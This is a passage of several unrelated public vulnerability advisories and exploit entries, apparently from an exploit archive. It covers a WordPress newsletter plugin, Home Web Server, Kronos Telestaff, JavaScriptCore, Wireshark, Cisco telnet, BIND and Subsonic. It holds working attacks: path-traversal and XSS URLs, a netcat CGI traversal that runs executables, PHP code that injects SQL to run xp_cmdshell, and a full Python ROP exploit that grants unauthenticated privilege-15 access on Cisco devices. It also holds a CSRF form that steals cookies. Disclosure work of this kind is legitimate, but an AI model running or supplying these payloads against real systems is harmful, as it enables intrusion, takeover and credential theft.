various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, send GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results send back to the vendor
2017-06-01 Remaining test results send back to the vendor
2017-06-05 Coordinated Firmware and Advisory release
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-012
Advisory Title: WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Tribulant Newsletters Plugin
Language: PHP
Version: 4.6.4.2 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/29
Risk: Medium
1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.
More information about WebScanner is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.
According to wordpress.org, it has more than 9,000 active installs.
Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin
3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.
3.1 File Disclosure
----
Input: $_GET['file']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
3.2 Cross-Site Scripting
----
Input: $_GET['method']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.3 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start
3.4 Cross-Site Scripting
----
Input: $_GET['id']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.5 Cross-Site Scripting
----
Input: $_GET['value']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>
3.6 Cross-Site Scripting
----
Input: $_GET['order']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3.7 Cross-Site Scripting
----
Input: $_GET['wpmlsearchterm']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
3.8 Cross-Site Scripting
----
Input: $_GET['wpmlmessage']
Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerabilities. All users are strongly advised to update WordPress
Tribulant Newsletters plugin to the latest available version.
5. Credits
==========
Discovered with DefenseCode WebScanner security analyzer
by Neven Biruski.
6. Disclosure Timeline
======================
2017/04/04 Vendor contacted
2017/04/06 Vendor responded, update released
2017/05/29 Advisory released to the public
7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website
http://www.defensecode.com/ .
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.
Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.
Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
compare timing with
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems
<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
$code=XXXX // insert valid code
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload=str_replace(" ","%20",$payload);
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);
function strToHex($string){
$hex = '';
for ($i=0; $i<strlen($string); $i++){
$ord = ord($string[$i]);
$hexCode = dechex($ord);
$hex .= substr('0'.$hexCode, -2);
}
return "0x".strToUpper($hex);
}
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
Solution
================
From Vendor:
Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
===========
www.isc.org
Product:
===========
BIND9
v9.10.5 x86 / x64
BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
at the University of California at Berkeley.
Vulnerability Type:
===================
Privilege Escalation
CVE Reference:
==============
CVE-2017-3141
Security Issue:
================
BIND installs as a service with an unquoted service path, to exploit a local attacker must place
a malicious executable file named "Program.exe" in the path of the service, if the process runs under
some account other than the attackers it can be used to exec code under a different set of privileges.
C:\>sc qc named
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: named
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ISC BIND
DEPENDENCIES :
SERVICE_START_NAME : .\named
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: May 13, 2017
Vendor confirm: May 14, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
======================
CSRF - Persistent XSS
CVE Reference:
==============
CVE-2017-9414
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
Then visit http://localhost:4040/index.view
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
Misc Reflected:
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx